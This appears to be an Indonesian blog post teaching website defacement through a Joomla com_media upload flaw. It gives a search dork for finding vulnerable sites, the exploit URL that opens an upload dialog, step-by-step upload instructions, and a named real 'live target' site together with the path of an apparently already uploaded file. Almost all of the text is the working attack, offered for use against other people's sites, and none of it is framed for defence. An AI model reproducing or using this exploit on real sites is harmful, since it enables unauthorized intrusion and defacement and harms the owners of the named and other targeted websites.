Deface Poc Com Media (Live Target)

Ok kali ini saya akan memberikan tips deface titip file.txt tanpa tebas index.

Poc: Com Media

Dork :
inurl:"/index.php?option=com_media"

Exploit :
index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

Script: txt, jpg


Step to Step:
Dorking dulu pake dork diatas
Kasih exploit: http://target.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

Kalo tampilannya udah ada tab Option Upload berarti udh bisa tinggal diupload aja scriptnya


Cara ngeliat file/script kita gimana?

kita kasih dir images dibelakang sitenya
contoh:
http://target.com/images/file_lu.txt atau http://target.com//images/file_lu.txt

*Yang ini / slash nya 1
*Yang ini // slash nya 2

Live target:
http://www.copoint.co.uk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

jadinya kalau berhasil kek gini:
http://www.copoint.co.uk/images/babymoon.txt

Berlangganan update artikel terbaru via email:

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel